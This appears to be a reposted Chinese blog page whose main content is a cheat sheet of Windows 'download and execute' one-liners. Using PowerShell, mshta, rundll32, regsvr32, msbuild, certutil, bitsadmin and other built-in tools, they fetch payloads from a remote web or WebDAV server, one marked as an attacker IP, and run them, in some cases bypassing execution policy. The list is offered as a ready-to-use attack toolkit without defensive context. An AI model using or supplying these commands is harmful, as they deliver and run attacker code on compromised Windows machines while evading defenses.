windows下载执行方法推荐

最新推荐文章于 2023-08-30 17:04:30 发布
最新推荐文章于 2023-08-30 17:04:30 发布
阅读量209 收藏
点赞数
文章标签: javascript ViewUI
原文链接:http://www.cnblogs.com/heycomputer/articles/10411402.html
版权

Downloaded files location

  • C:\Users<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>
  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

 

Powershell

From an HTTP server

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

From a Webdav server

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

 

Cmd

cmd.exe /k < \\webdavserver\folder\batchfile.txt

 

Cscript / Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

 

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta

 

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

 

Regasm / Regsvc @subTee

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

 

Regsvr32 @subTee

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

 

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

 

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

 

Certutil

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

 

Bitsadmin

bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe

 

References

转载于:https://www.cnblogs.com/heycomputer/articles/10411402.html

weixin_30882895
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
前端文件下载
秦兟
12-11 1321
设计前端文件下载
JS下载文件的三种方法
热门推荐
from_the_star的博客
01-11 2万+
因为公司后端忙得无法给批量下载的api,就我们前端自己把多张图片打包成zip下载,zip打包我们用的是jszip,下面是js实现下载的三种方法: 利用HTML download 属性 var a = document.createElement('a'); //需要下载的数据内容,我这里放的就是BLOB,如果你有下载链接就不需要了 var url = wi...
js实现文件下载的两种简单方式
風☆小贤‘s 烂笔头
06-03 1408
【1.使用window.open】
下载方法,移动端或者浏览器均可
杨鑫的博客
12-19 2756
window.downloadFile = function (sUrl) {     //iOS devices do not support downloading. We have to inform user about this.     if (/(iP)/g.test(navigator.userAgent)) {         alert('Your device
常见的下载方式
du_aitiantian的博客
08-30 284
前端操作中常用到的下载方式
Windows文件下载执行的15种姿势1
08-03
本文将介绍15种常见的文件下载执行技术,这些技术涵盖了多种工具和方法,适用于不同场景和环境。 1. **PowerShell**: PowerShell是一种强大的命令行工具和脚本环境,允许用户执行命令和编写脚本。例如,可以使用`...
Redis windows 64 版本 下载
最新发布
03-20
以下是对"Redis windows 64 版本 下载"相关知识点的详细说明: 1. **Redis简介**: - Redis是Remote Dictionary Server的缩写,由Salvatore Sanfilippo创建,最初是为了解决Memcached在某些特定场景下的不足。 - ...
nvm windows下载,nvm版本v1.1.11下载
05-17
标题中的 "nvm windows下载" 指的是在Windows操作系统中下载NVM的过程。NVM Windows版本的下载链接可以从其官方网站获取,确保下载的是最新且安全的版本。在本例中,提到的是版本号为 **v1.1.11** 的安装程序,这...
xshell上传下载文件(Windows、Linux)
09-15
同样,从Linux下载文件到Windows,只需在Linux终端中执行`sz 文件名`命令,xshell会自动弹出窗口让你选择保存位置。 总的来说,xshell的ZMODEM功能为Windows与Linux之间的文件传输提供了极大的便利,节省了时间,...
阿里云OSS客户端Windows版本下载
12-28
通常,.exe文件是Windows系统的可执行程序,这意味着用户下载后可以直接运行安装这个客户端软件。版本号"v1.1.9.0"表明这是软件的第1.1.9.0次更新,可能包含了性能优化、新功能或者修复已知问题。 使用阿里云OSS...
js window方法大全
05-16
js window 属性方法大全 Status 窗口状态栏信息,值为yes显示状态栏,no不显示状态栏 window.statusbar. visible 状态栏可见返回true,不可见返回false defaultstatus 状态栏默认显示值 location 给出当前窗口的url信息,或指定打开窗口的url,值为no不显示地址栏 window.locationbar. visible 地址栏可见返回true,不可见返回false 等等等。。。。。。
window属性和方法
07-23
这里面包含了window的所有方法和属性的基本用法,特别适合初学者学习bom
前端实现下载文件的各种方式
码农键盘上的梦
02-27 5867
上面的方案这么多,其实最终还是落到a标签上,所以不管是通过浏览器的内置行为进行下载,还是通过ajax进行下载,文件下载的最终还是浏览器的行为。
通过window.open使用url下载文件和download属性
孜然卷的博客
09-15 6091
JavaScript通过window.open(url)下载文件修改文件名
Windows文件下载执行的15种姿势
04-15 2万+
当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。第一...
Windows下载执行命令大全
闵行小鱼塘
08-04 5962
转载的执行命令大全
Windows下默认远程下载
weiliang369的博客
03-11 1262
场景: 在过去我在做某次台湾渗透的过程中遇到了一个sql注入,数据库权限是sa权限,主机在内网无法直接登录,我们需要上传nc或者其他的转发程序将其转发出来,即便不行,我们也需要上传一个shell,但是基于没有后台的情况下,我们只能将希望寄托于sa。 应用: Powershell certutil ftp Powershell 在windows版本中powershell支持部分linux命令。如curl,所以可以在系统支持powershell的情况下我们可以使用: curl -O htt
javascript中download关键字的方法名调用问题
QAlong WorkSpace
07-16 1396
今天在写代码的时候发现一个很奇怪的现象,代码如下: 这个demo在ie8下正常,但是在chrome和ff都有问题 [code="javascript"] function download(){ alert("123"); } Test [/code] 查阅了一下资料发现了答案: http://stack...
文件下载的正确打开方式
乔的博客
02-01 228
这里主要的逻辑是当我们的请求成功后,我们会拿到响应体的response,这个response就是我们要下载的内容,然后我们把它转换成blob对象,然后通过URL.createObjectURL来创建一个url,然后通过a标签的download属性来实现文件下载。它的作用是指定下载的文件名,如果不指定,那么下载的文件名就会根据请求内容的Content-Disposition来确定,如果没有Content-Disposition,那么就会使用请求的URL的最后一部分作为文件名。的,对比于a标签,这种方式。
"Windows文件下载执行技巧:15种方式揭秘
除了远程下载执行之外,还有其他常见的实现Windows文件下载执行的方式。其中包括远程下载文件到本地,然后再执行等方式。只要所在服务器的环境支持,还可以通过任何一门语言来实现文件下载执行操作。 在本文中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值